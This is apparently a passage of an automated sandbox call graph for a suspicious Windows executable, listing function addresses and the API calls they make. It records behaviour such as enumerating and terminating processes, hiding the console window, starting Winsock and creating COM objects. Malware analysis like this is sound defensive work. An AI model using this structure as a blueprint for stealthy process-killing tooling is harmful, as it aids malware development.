42357 7ff72c9cf4a0 50 API calls 42356->42357 42358 7ff72c9c90c8 42357->42358 42359 7ff72c9ceed0 50 API calls 42358->42359 42360 7ff72c9c9107 42359->42360 42361 7ff72c9cece0 50 API calls 42360->42361 42362 7ff72c9c9131 42361->42362 42363 7ff72c9cf4a0 50 API calls 42362->42363 42364 7ff72c9c9170 42363->42364 42365 7ff72c9cf4a0 50 API calls 42364->42365 42366 7ff72c9c918b 42365->42366 42367 7ff72c9cf4a0 50 API calls 42366->42367 42368 7ff72c9c919f 42367->42368 42369 7ff72c9ceed0 50 API calls 42368->42369 42370 7ff72c9c91de 42369->42370 42371 7ff72c9cf4a0 50 API calls 42370->42371 42372 7ff72c9c91f2 42371->42372 42373 7ff72c9ceed0 50 API calls 42372->42373 42374 7ff72c9c9231 42373->42374 42375 7ff72c9cece0 50 API calls 42374->42375 42376 7ff72c9c926a 42375->42376 42377 7ff72c9cf4a0 50 API calls 42376->42377 42378 7ff72c9c927e 42377->42378 42379 7ff72c9cf4a0 50 API calls 42378->42379 42380 7ff72c9c92a3 42379->42380 42381 7ff72c9cece0 50 API calls 42380->42381 42382 7ff72c9c92b0 42381->42382 42383 7ff72c9cece0 50 API calls 42382->42383 42384 7ff72c9c92bd 42383->42384 42385 7ff72c9cf4a0 50 API calls 42384->42385 42386 7ff72c9c9308 42385->42386 42387 7ff72c9d2960 50 API calls 42386->42387 42388 7ff72c9c9323 42387->42388 42389 7ff72c9cf4a0 50 API calls 42388->42389 42390 7ff72c9c9337 42389->42390 42391 7ff72c9cece0 50 API calls 42390->42391 42392 7ff72c9c937a 42391->42392 42393 7ff72c9cf4a0 50 API calls 42392->42393 42394 7ff72c9c93b9 42393->42394 42395 7ff72c9cece0 50 API calls 42394->42395 42396 7ff72c9c9412 42395->42396 42397 7ff72c9cf4a0 50 API calls 42396->42397 42398 7ff72c9c9426 42397->42398 42399 7ff72c9cf4a0 50 API calls 42398->42399 42400 7ff72c9c944b 42399->42400 42401 7ff72c9cece0 50 API calls 42400->42401 42402 7ff72c9c9458 42401->42402 42403 7ff72c9cece0 50 API calls 42402->42403 42404 7ff72c9c9465 42403->42404 42405 7ff72c9cf4a0 50 API calls 42404->42405 42406 7ff72c9c94b0 42405->42406 42407 7ff72c9d2960 50 API calls 42406->42407 42408 7ff72c9c94cb 42407->42408 42409 7ff72c9cf4a0 50 API calls 42408->42409 42410 7ff72c9c94df 42409->42410 42411 7ff72c9cf4a0 50 API calls 42410->42411 42412 7ff72c9c94f3 42411->42412 42413 7ff72c9cf4a0 50 API calls 42412->42413 42414 7ff72c9c9507 42413->42414 42415 7ff72c9ceed0 50 API calls 42414->42415 42416 7ff72c9c9546 42415->42416 42417 7ff72c9cf4a0 50 API calls 42416->42417 42418 7ff72c9c9557 42417->42418 42419 7ff72c9ceed0 50 API calls 42418->42419 42420 7ff72c9c9590 42419->42420 42421 7ff72c9cece0 50 API calls 42420->42421 42422 7ff72c9c95ba 42421->42422 42423 7ff72c9cf4a0 50 API calls 42422->42423 42424 7ff72c9c95f9 42423->42424 42425 7ff72c9cf4a0 50 API calls 42424->42425 42426 7ff72c9c9614 42425->42426 42427 7ff72c9cf4a0 50 API calls 42426->42427 42428 7ff72c9c9628 42427->42428 42429 7ff72c9ceed0 50 API calls 42428->42429 42430 7ff72c9c9667 42429->42430 42431 7ff72c9cf4a0 50 API calls 42430->42431 42432 7ff72c9c9678 42431->42432 42433 7ff72c9ceed0 50 API calls 42432->42433 42434 7ff72c9c96b1 42433->42434 42435 7ff72c9cece0 50 API calls 42434->42435 42436 7ff72c9c96ea 42435->42436 42437 7ff72c9cf4a0 50 API calls 42436->42437 42438 7ff72c9c96fe 42437->42438 42439 7ff72c9cf4a0 50 API calls 42438->42439 42440 7ff72c9c9723 42439->42440 42441 7ff72c9cece0 50 API calls 42440->42441 42442 7ff72c9c9730 42441->42442 42443 7ff72c9cece0 50 API calls 42442->42443 42444 7ff72c9c973d 42443->42444 42445 7ff72c9cf4a0 50 API calls 42444->42445 42446 7ff72c9c9788 42445->42446 42447 7ff72c9d2960 50 API calls 42446->42447 42448 7ff72c9c97a3 42447->42448 42449 7ff72c9cf4a0 50 API calls 42448->42449 42450 7ff72c9c97b7 42449->42450 42451 7ff72c9cf4a0 50 API calls 42450->42451 42452 7ff72c9c97cb 42451->42452 42453 7ff72c9cf4a0 50 API calls 42452->42453 42454 7ff72c9c97df 42453->42454 42455 7ff72c9ceed0 50 API calls 42454->42455 42456 7ff72c9c981e 42455->42456 42457 7ff72c9cf4a0 50 API calls 42456->42457 42458 7ff72c9c9832 42457->42458 42459 7ff72c9ceed0 50 API calls 42458->42459 42460 7ff72c9c9871 42459->42460 42461 7ff72c9cece0 50 API calls 42460->42461 42462 7ff72c9c989b 42461->42462 42463 7ff72c9cf4a0 50 API calls 42462->42463 42464 7ff72c9c98da 42463->42464 42465 7ff72c9cf4a0 50 API calls 42464->42465 42466 7ff72c9c98f5 42465->42466 42467 7ff72c9cf4a0 50 API calls 42466->42467 42468 7ff72c9c9909 42467->42468 42469 7ff72c9ceed0 50 API calls 42468->42469 42470 7ff72c9c9948 42469->42470 42471 7ff72c9cf4a0 50 API calls 42470->42471 42472 7ff72c9c995c 42471->42472 42473 7ff72c9ceed0 50 API calls 42472->42473 42474 7ff72c9c999b 42473->42474 42475 7ff72c9cece0 50 API calls 42474->42475 42476 7ff72c9c99d4 42475->42476 42477 7ff72c9cf4a0 50 API calls 42476->42477 42478 7ff72c9c99e8 42477->42478 42479 7ff72c9cf4a0 50 API calls 42478->42479 42480 7ff72c9c9a0d 42479->42480 42481 7ff72c9cece0 50 API calls 42480->42481 42482 7ff72c9c9a1a 42481->42482 42483 7ff72c9cece0 50 API calls 42482->42483 42484 7ff72c9c9a27 42483->42484 42485 7ff72c9cf4a0 50 API calls 42484->42485 42486 7ff72c9c9a72 42485->42486 42487 7ff72c9d2960 50 API calls 42486->42487 42488 7ff72c9c9a8d 42487->42488 42489 7ff72c9cf4a0 50 API calls 42488->42489 42490 7ff72c9c9a9e 42489->42490 42491 7ff72c9cf4a0 50 API calls 42490->42491 42492 7ff72c9c9ab2 42491->42492 42493 7ff72c9cf4a0 50 API calls 42492->42493 42494 7ff72c9c9ac6 42493->42494 42495 7ff72c9ceed0 50 API calls 42494->42495 42496 7ff72c9c9b05 42495->42496 42497 7ff72c9cf4a0 50 API calls 42496->42497 42498 7ff72c9c9b19 42497->42498 42499 7ff72c9ceed0 50 API calls 42498->42499 42500 7ff72c9c9b58 42499->42500 42501 7ff72c9cece0 50 API calls 42500->42501 42502 7ff72c9c9b82 42501->42502 42503 7ff72c9cf4a0 50 API calls 42502->42503 42504 7ff72c9c9bc1 42503->42504 42505 7ff72c9cf4a0 50 API calls 42504->42505 42506 7ff72c9c9bdc 42505->42506 42507 7ff72c9cf4a0 50 API calls 42506->42507 42508 7ff72c9c9bf0 42507->42508 42509 7ff72c9ceed0 50 API calls 42508->42509 42510 7ff72c9c9c2f 42509->42510 42511 7ff72c9cf4a0 50 API calls 42510->42511 42512 7ff72c9c9c43 42511->42512 42513 7ff72c9ceed0 50 API calls 42512->42513 42514 7ff72c9c9c82 42513->42514 42515 7ff72c9cece0 50 API calls 42514->42515 42516 7ff72c9c9cbb 42515->42516 42517 7ff72c9cf4a0 50 API calls 42516->42517 42518 7ff72c9c9ccf 42517->42518 42519 7ff72c9cf4a0 50 API calls 42518->42519 42520 7ff72c9c9cf4 42519->42520 42521 7ff72c9cece0 50 API calls 42520->42521 42522 7ff72c9c9d01 42521->42522 42523 7ff72c9cece0 50 API calls 42522->42523 42524 7ff72c9c9d0e 42523->42524 42525 7ff72c9cf4a0 50 API calls 42524->42525 42526 7ff72c9c9d59 42525->42526 42527 7ff72c9d2960 50 API calls 42526->42527 42528 7ff72c9c9d71 42527->42528 42529 7ff72c9cf4a0 50 API calls 42528->42529 42530 7ff72c9c9d85 42529->42530 42531 7ff72c9cf4a0 50 API calls 42530->42531 42532 7ff72c9c9d99 42531->42532 42533 7ff72c9cf4a0 50 API calls 42532->42533 42534 7ff72c9c9dad 42533->42534 42535 7ff72c9ceed0 50 API calls 42534->42535 42536 7ff72c9c9dec 42535->42536 42537 7ff72c9cf4a0 50 API calls 42536->42537 42538 7ff72c9c9e00 42537->42538 42539 7ff72c9ceed0 50 API calls 42538->42539 42540 7ff72c9c9e3f 42539->42540 42541 7ff72c9cece0 50 API calls 42540->42541 42542 7ff72c9c9e69 42541->42542 42543 7ff72c9cf4a0 50 API calls 42542->42543 42544 7ff72c9c9ea8 42543->42544 42545 7ff72c9cf4a0 50 API calls 42544->42545 42546 7ff72c9c9ec3 42545->42546 42547 7ff72c9cf4a0 50 API calls 42546->42547 42548 7ff72c9c9ed7 42547->42548 42549 7ff72c9ceed0 50 API calls 42548->42549 42550 7ff72c9c9f16 42549->42550 42551 7ff72c9cf4a0 50 API calls 42550->42551 42552 7ff72c9c9f2a 42551->42552 42553 7ff72c9ceed0 50 API calls 42552->42553 42554 7ff72c9c9f69 42553->42554 42555 7ff72c9cece0 50 API calls 42554->42555 42556 7ff72c9c9fa2 42555->42556 42557 7ff72c9cf4a0 50 API calls 42556->42557 42558 7ff72c9c9fb6 42557->42558 42559 7ff72c9cf4a0 50 API calls 42558->42559 42560 7ff72c9c9fdb 42559->42560 42561 7ff72c9cece0 50 API calls 42560->42561 42562 7ff72c9c9fe8 42561->42562 42563 7ff72c9cece0 50 API calls 42562->42563 42564 7ff72c9c9ff5 42563->42564 42565 7ff72c9cf4a0 50 API calls 42564->42565 42566 7ff72c9ca040 42565->42566 42567 7ff72c9d2960 50 API calls 42566->42567 42568 7ff72c9ca05b 42567->42568 42948 7ff72c9cc790 42568->42948 42570 7ff72c9ca09a 42960 7ff72c9cc660 42570->42960 42572 7ff72c9ca0c6 42971 7ff72c9b5d00 42572->42971 42574 7ff72c9ca14f 42575 7ff72c9cc660 47 API calls 42574->42575 42576 7ff72c9ca15c 42575->42576 42577 7ff72c9b5d00 47 API calls 42576->42577 42578 7ff72c9ca1e2 42577->42578 42579 7ff72c9cc660 47 API calls 42578->42579 42580 7ff72c9ca1ef 42579->42580 42581 7ff72c9b5d00 47 API calls 42580->42581 42582 7ff72c9ca278 42581->42582 42583 7ff72c9cc660 47 API calls 42582->42583 42584 7ff72c9ca285 42583->42584 42585 7ff72c9b5d00 47 API calls 42584->42585 42586 7ff72c9ca308 42585->42586 42587 7ff72c9cc660 47 API calls 42586->42587 42588 7ff72c9ca315 42587->42588 42589 7ff72c9b5d00 47 API calls 42588->42589 42590 7ff72c9ca322 42589->42590 42591 7ff72c9cc660 47 API calls 42590->42591 42592 7ff72c9ca32f 42591->42592 42593 7ff72c9b5d00 47 API calls 42592->42593 42594 7ff72c9ca3b8 42593->42594 42595 7ff72c9cc660 47 API calls 42594->42595 42596 7ff72c9ca3c5 42595->42596 42597 7ff72c9b5d00 47 API calls 42596->42597 42598 7ff72c9ca42d 42597->42598 42599 7ff72c9cc660 47 API calls 42598->42599 42600 7ff72c9ca43a 42599->42600 42601 7ff72c9b5d00 47 API calls 42600->42601 42602 7ff72c9ca4c0 42601->42602 42603 7ff72c9cc660 47 API calls 42602->42603 42604 7ff72c9ca4cd 42603->42604 42605 7ff72c9b5d00 47 API calls 42604->42605 42606 7ff72c9ca550 42605->42606 42607 7ff72c9cc660 47 API calls 42606->42607 42608 7ff72c9ca55d 42607->42608 42609 7ff72c9b5d00 47 API calls 42608->42609 42610 7ff72c9ca5e3 42609->42610 42976 7ff72c9c5ec0 42610->42976 42614 7ff72c9ca5ed 43140 7ff72c9b7c50 42614->43140 42616 7ff72c9ca605 42617 7ff72c9cf4a0 50 API calls 42616->42617 42618 7ff72c9ca619 42617->42618 42619 7ff72c9b5d00 47 API calls 42618->42619 42623 7ff72c9ca621 42619->42623 42620 7ff72c9cc2fb 42621 7ff72c9cf4a0 50 API calls 42620->42621 42622 7ff72c9cc30f 42621->42622 42624 7ff72c9b5d00 47 API calls 42622->42624 42623->42620 42625 7ff72c9b5d00 47 API calls 42623->42625 42629 7ff72c9ca667 42623->42629 42626 7ff72c9cc317 42624->42626 42625->42623 42627 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42626->42627 42628 7ff72c9cc324 42627->42628 44210 7ff72c9b2370 50 API calls 3 library calls 42628->44210 42629->42620 43227 7ff72c9cd0e0 42629->43227 42632 7ff72c9cc32a 42636 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42632->42636 42633 7ff72c9cb22f 42634 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 42633->42634 42635 7ff72c9cb260 42634->42635 42639 7ff72c9d4160 50 API calls 42635->42639 42640 7ff72c9cc330 42636->42640 42637 7ff72c9cc354 44214 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 42637->44214 42648 7ff72c9cb292 _Receive_impl 42639->42648 42643 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42640->42643 42641 7ff72c9d60e0 50 API calls 42838 7ff72c9ca696 __std_exception_copy std::_Locinfo::_Locinfo_ctor ctype _Receive_impl 42641->42838 42642 7ff72c9cc35a 42645 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42642->42645 42644 7ff72c9cc336 42643->42644 44211 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 42644->44211 42646 7ff72c9cc360 42645->42646 44215 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 42646->44215 42647 7ff72c9d44a0 50 API calls std::_Throw_Cpp_error 42647->42838 42648->42642 42651 7ff72c9cb2f0 42648->42651 42652 7ff72c9cb4c2 42648->42652 42650 7ff72c9cc342 42655 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42650->42655 42657 7ff72c9d1fe0 10 API calls 42651->42657 42656 7ff72c9d1fe0 10 API calls 42652->42656 42653 7ff72c9cc33c 42664 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42653->42664 42661 7ff72c9cc348 42655->42661 42662 7ff72c9cb4d5 42656->42662 42659 7ff72c9cb303 42657->42659 42663 7ff72c9d22a0 87 API calls 42659->42663 44212 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 42661->44212 42665 7ff72c9d22a0 87 API calls 42662->42665 42666 7ff72c9cb30b 42663->42666 42664->42650 42669 7ff72c9cb4c0 42665->42669 42670 7ff72c9cf4a0 50 API calls 42666->42670 42673 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 42669->42673 42675 7ff72c9cb31e 42670->42675 42672 7ff72c9cc34e 44213 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 42672->44213 42674 7ff72c9cb50e 42673->42674 43716 7ff72c9bb600 42674->43716 42678 7ff72c9cf4a0 50 API calls 42675->42678 42682 7ff72c9cb332 42678->42682 43490 7ff72c9b6190 42682->43490 42717 7ff72c9cf4a0 50 API calls 42717->42838 42723 7ff72c9b5d00 47 API calls 42723->42838 42757 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 42757->42838 42779 7ff72c9f2a38 50 API calls std::_Facet_Register 42779->42838 42794 7ff72c9e8f10 67 API calls 42794->42838 42822 7ff72c9e74c0 58 API calls 42822->42838 42838->42626 42838->42628 42838->42632 42838->42633 42838->42637 42838->42640 42838->42641 42838->42644 42838->42647 42838->42650 42838->42653 42838->42661 42838->42672 42838->42717 42838->42723 42838->42757 42838->42779 42838->42794 42838->42822 42840 7ff72c9e8e50 50 API calls 42838->42840 43230 7ff72c9be790 42838->43230 43361 7ff72c9d08c0 42838->43361 43366 7ff72c9cec10 42838->43366 43371 7ff72c9c10f0 42838->43371 43474 7ff72c9d3ad0 42838->43474 43478 7ff72c9c0ff0 42838->43478 44193 7ff72c9d2c60 50 API calls 4 library calls 42838->44193 44194 7ff72c9e94c0 58 API calls 4 library calls 42838->44194 44195 7ff72c9d2ee0 50 API calls 3 library calls 42838->44195 44196 7ff72c9d5e60 50 API calls 3 library calls 42838->44196 44197 7ff72c9d46a0 47 API calls 2 library calls 42838->44197 44198 7ff72c9c21c0 127 API calls 7 library calls 42838->44198 44199 7ff72c9c2ef0 127 API calls 7 library calls 42838->44199 44200 7ff72c9d0370 42838->44200 42840->42838 42872->42199 42876 7ff72c9cf060 42875->42876 42876->42876 42877 7ff72c9d4160 50 API calls 42876->42877 42878 7ff72c9c845a 42877->42878 42879 7ff72c9c7970 42878->42879 44216 7ff72c9f3600 42879->44216 42882 7ff72c9c79ad 44218 7ff72c9d1dc0 42882->44218 42883 7ff72c9c7a10 OpenProcess 42891 7ff72c9c79cf __scrt_get_show_window_mode 42883->42891 42885 7ff72c9f2770 codecvt 8 API calls 42887 7ff72c9c7b70 42885->42887 42886 7ff72c9c79c8 42886->42885 42900 7ff72c9d1fe0 42887->42900 42888 7ff72c9c7a6a K32EnumProcessModules 42889 7ff72c9c7a87 K32GetModuleBaseNameW 42888->42889 42888->42891 42889->42891 42890 7ff72c9c7b2b CloseHandle 42890->42891 42891->42883 42891->42886 42891->42888 42891->42890 42892 7ff72c9c7b04 TerminateProcess 42891->42892 42893 7ff72c9c7b1b 42892->42893 42894 7ff72c9d1fe0 10 API calls 42893->42894 42895 7ff72c9c7b8c 42894->42895 42896 7ff72c9d1fe0 10 API calls 42895->42896 42897 7ff72c9c7b97 42896->42897 42898 7ff72c9d22a0 87 API calls 42897->42898 42899 7ff72c9c7b9f CloseHandle 42898->42899 42899->42886 42901 7ff72c9d2010 42900->42901 42902 7ff72c9d1160 10 API calls 42901->42902 42905 7ff72c9d205f 42901->42905 42902->42905 42903 7ff72c9c849c 42910 7ff72c9d2420 42903->42910 42904 7ff72c9d220e 42904->42903 44257 7ff72c9d12c0 RtlPcToFileHeader RaiseException _com_raise_error 42904->44257 42905->42904 42907 7ff72c9d224c 42905->42907 44258 7ff72c9f49c0 RtlPcToFileHeader RaiseException 42907->44258 42909 7ff72c9d229f 42911 7ff72c9d242b 42910->42911 42912 7ff72c9d1160 10 API calls 42911->42912 42913 7ff72c9d7096 42911->42913 42912->42913 42914 7ff72c9d723a 42913->42914 42917 7ff72c9d7282 42913->42917 42915 7ff72c9c84ab 42914->42915 44259 7ff72c9d12c0 RtlPcToFileHeader RaiseException _com_raise_error 42914->44259 42915->42182 44260 7ff72c9f49c0 RtlPcToFileHeader RaiseException 42917->44260 42919 7ff72c9d72d7 42921 7ff72c9d22c8 42920->42921 44261 7ff72c9d72e0 42921->44261 42926 7ff72c9d1160 10 API calls 42927 7ff72c9c84be GetConsoleWindow ShowWindow WSAStartup 42926->42927 42927->42186 42927->42187 42929 7ff72c9cef11 42928->42929 42930 7ff72c9cef68 42928->42930 44295 7ff72c9d5e60 50 API calls 3 library calls 42929->44295 42931 7ff72c9f2770 codecvt 8 API calls 42930->42931 42933 7ff72c9c859d 42931->42933 42933->42203 42934 7ff72c9cef16 42935 7ff72c9cef5d 42934->42935 42937 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 42934->42937 44296 7ff72c9d46a0 47 API calls 2 library calls 42935->44296 42937->42934 42939 7ff72c9f2a38 std::_Facet_Register 50 API calls 42938->42939 42940 7ff72c9c861a 42939->42940 42940->42209 42942 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 42941->42942 42943 7ff72c9d297f 42942->42943 44297 7ff72c9d29c0 42943->44297 42946 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 42947 7ff72c9c8803 42946->42947 42947->42235 42949 7ff72c9f2a38 std::_Facet_Register 50 API calls 42948->42949 42958 7ff72c9cc7c5 42949->42958 42950 7ff72c9cc8e6 42950->42570 42951 7ff72c9cc904 44350 7ff72c9b39b0 50 API calls std::_Throw_Cpp_error 42951->44350 42952 7ff72c9f2a38 std::_Facet_Register 50 API calls 42952->42958 42954 7ff72c9cf4e0 50 API calls std::_Throw_Cpp_error 42954->42958 42955 7ff72c9d29c0 50 API calls 42955->42958 42958->42950 42958->42951 42958->42952 42958->42954 42958->42955 42961 7ff72c9cc676 _Receive_impl 42960->42961 42962 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42961->42962 42963 7ff72c9cc6d5 42962->42963 42964 7ff72c9cc660 47 API calls 42963->42964 42966 7ff72c9cc6f2 42964->42966 42965 7ff72c9cc720 _Receive_impl 42965->42572 42966->42965 42967 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42966->42967 42970 7ff72c9cc746 _Receive_impl 42967->42970 42968 7ff72c9cc961 42970->42968 44351 7ff72c9cc6e0 47 API calls 2 library calls 42970->44351 42972 7ff72c9b5d13 42971->42972 42973 7ff72c9b5d37 _Receive_impl 42971->42973 42972->42973 42974 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42972->42974 42973->42574 42975 7ff72c9b5d5d 42974->42975 42977 7ff72c9f2a38 std::_Facet_Register 50 API calls 42976->42977 42991 7ff72c9c5f0f __scrt_get_show_window_mode 42977->42991 42978 7ff72c9c5f47 GetModuleFileNameA 42979 7ff72c9c5fe1 42978->42979 42980 7ff72c9c5f65 GetLastError 42978->42980 42981 7ff72c9c5fea GetLastError 42979->42981 42982 7ff72c9c60a8 42979->42982 42980->42979 42980->42991 42983 7ff72c9c6015 42981->42983 42985 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 42982->42985 42983->42983 42984 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 42983->42984 42988 7ff72c9c602b _Receive_impl 42984->42988 42986 7ff72c9c60ea 42985->42986 42989 7ff72c9c610a 42986->42989 42990 7ff72c9c78e9 42986->42990 42992 7ff72c9c6063 _Receive_impl 42988->42992 43013 7ff72c9c7955 42988->43013 42993 7ff72c9d60e0 50 API calls 42989->42993 44354 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 42990->44354 42991->42978 44352 7ff72c9d7bd0 50 API calls 6 library calls 42991->44352 43001 7ff72c9c795b 42992->43001 43054 7ff72c9c6096 _Receive_impl 42992->43054 43005 7ff72c9c6148 _Receive_impl 42993->43005 42995 7ff72c9c6185 CoInitializeEx 42998 7ff72c9c6197 42995->42998 42999 7ff72c9c629c CoCreateInstance 42995->42999 42996 7ff72c9f2770 codecvt 8 API calls 43000 7ff72c9c78cb 42996->43000 42997 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 42997->43001 43006 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 42998->43006 43007 7ff72c9c63e0 VariantInit VariantInit VariantInit VariantInit 42999->43007 43008 7ff72c9c62d5 42999->43008 43110 7ff72c9b5d60 CreateToolhelp32Snapshot 43000->43110 43002 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43001->43002 43003 7ff72c9c7961 43002->43003 43004 7ff72c9c78ee 43009 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43004->43009 43005->42995 43005->43004 43010 7ff72c9c61c0 43006->43010 43012 7ff72c9c6533 VariantClear VariantClear VariantClear VariantClear 43007->43012 43011 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43008->43011 43009->43013 43010->42988 43010->43004 43014 7ff72c9c62fe 43011->43014 43016 7ff72c9c6691 43012->43016 43017 7ff72c9c6578 43012->43017 43013->42997 43014->43004 43015 7ff72c9c633b CoUninitialize 43014->43015 43018 7ff72c9c6336 _Receive_impl 43014->43018 43015->42988 43015->42992 43020 7ff72c9f2a38 std::_Facet_Register 50 API calls 43016->43020 43019 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43017->43019 43018->43015 43021 7ff72c9c65a1 43019->43021 43022 7ff72c9c66b2 43020->43022 43021->43004 43023 7ff72c9c65d9 _Receive_impl 43021->43023 43024 7ff72c9c66bf SysAllocString 43022->43024 43026 7ff72c9c66ef 43022->43026 43025 7ff72c9c65ec CoUninitialize 43023->43025 43024->43004 43024->43026 43025->42988 43025->42992 43026->43004 43027 7ff72c9c672d SysFreeString 43026->43027 43030 7ff72c9c6736 _Receive_impl 43026->43030 43027->43030 43028 7ff72c9c6880 43032 7ff72c9f2a38 std::_Facet_Register 50 API calls 43028->43032 43029 7ff72c9c675d 43031 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43029->43031 43030->43028 43030->43029 43033 7ff72c9c6786 43031->43033 43034 7ff72c9c6899 43032->43034 43033->43004 43036 7ff72c9c67be _Receive_impl 43033->43036 43035 7ff72c9c68a6 SysAllocString 43034->43035 43038 7ff72c9c68d6 43034->43038 43035->43004 43035->43038 43037 7ff72c9c67d1 CoUninitialize 43036->43037 43037->42988 43037->42992 43038->43004 43039 7ff72c9c690e SysFreeString 43038->43039 43040 7ff72c9c6917 _Receive_impl 43038->43040 43039->43040 43041 7ff72c9c6a91 43040->43041 43042 7ff72c9c696e 43040->43042 43046 7ff72c9c6be8 43041->43046 43047 7ff72c9c6ab7 43041->43047 43043 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43042->43043 43044 7ff72c9c6997 43043->43044 43044->43004 43045 7ff72c9c69cf _Receive_impl 43044->43045 43049 7ff72c9c69e2 CoUninitialize 43045->43049 43052 7ff72c9c6d58 43046->43052 43053 7ff72c9c6c27 43046->43053 43048 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43047->43048 43050 7ff72c9c6ae0 43048->43050 43049->42988 43049->42992 43050->43004 43051 7ff72c9c6b18 _Receive_impl 43050->43051 43056 7ff72c9c6b39 CoUninitialize 43051->43056 43059 7ff72c9c6ec0 43052->43059 43060 7ff72c9c6d8f 43052->43060 43055 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43053->43055 43054->42996 43057 7ff72c9c6c50 43055->43057 43056->42988 43056->42992 43057->43004 43058 7ff72c9c6c88 _Receive_impl 43057->43058 43062 7ff72c9c6ca9 CoUninitialize 43058->43062 43065 7ff72c9c7029 43059->43065 43066 7ff72c9c6ef8 43059->43066 43061 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43060->43061 43063 7ff72c9c6db8 43061->43063 43062->42988 43062->42992 43063->43004 43064 7ff72c9c6df0 _Receive_impl 43063->43064 43068 7ff72c9c6e11 CoUninitialize 43064->43068 43071 7ff72c9c7196 43065->43071 43072 7ff72c9c7065 43065->43072 43067 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43066->43067 43069 7ff72c9c6f21 43067->43069 43068->42988 43068->42992 43069->43004 43070 7ff72c9c6f59 _Receive_impl 43069->43070 43075 7ff72c9c6f7a CoUninitialize 43070->43075 43074 7ff72c9f2a38 std::_Facet_Register 50 API calls 43071->43074 43073 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43072->43073 43076 7ff72c9c708e 43073->43076 43077 7ff72c9c71c9 43074->43077 43075->42988 43075->42992 43076->43004 43078 7ff72c9c70c6 _Receive_impl 43076->43078 43081 7ff72c9c71f5 43077->43081 44353 7ff72c9f2440 25 API calls 3 library calls 43077->44353 43080 7ff72c9c70e7 CoUninitialize 43078->43080 43080->42988 43080->42992 43081->43004 43082 7ff72c9c722f SysFreeString 43081->43082 43083 7ff72c9c7238 _Receive_impl 43081->43083 43082->43083 43084 7ff72c9c726d 43083->43084 43091 7ff72c9c739e SysAllocString 43083->43091 43085 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43084->43085 43086 7ff72c9c7296 43085->43086 43086->43004 43087 7ff72c9c72ce _Receive_impl 43086->43087 43094 7ff72c9c72ef CoUninitialize 43087->43094 43089 7ff72c9c7438 VariantInit SysAllocString 43089->43004 43090 7ff72c9c74af 43089->43090 43092 7ff72c9f2a38 std::_Facet_Register 50 API calls 43090->43092 43091->43004 43091->43089 43093 7ff72c9c74e0 43092->43093 43095 7ff72c9c74f0 SysAllocString 43093->43095 43096 7ff72c9c7520 43093->43096 43094->42988 43094->42992 43095->43004 43095->43096 43096->43004 43097 7ff72c9c7620 VariantClear VariantClear VariantClear 43096->43097 43100 7ff72c9c75f7 SysFreeString 43096->43100 43104 7ff72c9c7600 _Receive_impl 43096->43104 43098 7ff72c9c7666 43097->43098 43099 7ff72c9c778e 43097->43099 43105 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43098->43105 43101 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43099->43101 43100->43104 43102 7ff72c9c77a5 43101->43102 43102->43004 43103 7ff72c9c77dd _Receive_impl 43102->43103 43109 7ff72c9c780c CoUninitialize 43103->43109 43104->43097 43106 7ff72c9c7686 43105->43106 43106->43004 43107 7ff72c9c76be _Receive_impl 43106->43107 43108 7ff72c9c76df CoUninitialize 43107->43108 43108->42988 43108->42992 43109->42988 43109->42992 43111 7ff72c9b5db1 43110->43111 43112 7ff72c9b5e20 Process32FirstW 43110->43112 43114 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43111->43114 43113 7ff72c9b5fe4 CloseHandle 43112->43113 43118 7ff72c9b5e40 _Receive_impl 43112->43118 44355 7ff72c9b39d0 43113->44355 43117 7ff72c9b5ddc 43114->43117 43119 7ff72c9b5e14 _Receive_impl 43117->43119 43122 7ff72c9b6180 43117->43122 43120 7ff72c9d4160 50 API calls 43118->43120 43118->43122 43132 7ff72c9b5f20 OpenProcess 43118->43132 43133 7ff72c9b5fce Process32NextW 43118->43133 43137 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43118->43137 43138 7ff72c9b5fb0 TerminateProcess CloseHandle 43118->43138 43139 7ff72c9b5fab _Receive_impl 43118->43139 43121 7ff72c9f2770 codecvt 8 API calls 43119->43121 43120->43118 43125 7ff72c9b6119 43121->43125 43123 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43122->43123 43126 7ff72c9b6185 43123->43126 43124 7ff72c9b39d0 2 API calls 43130 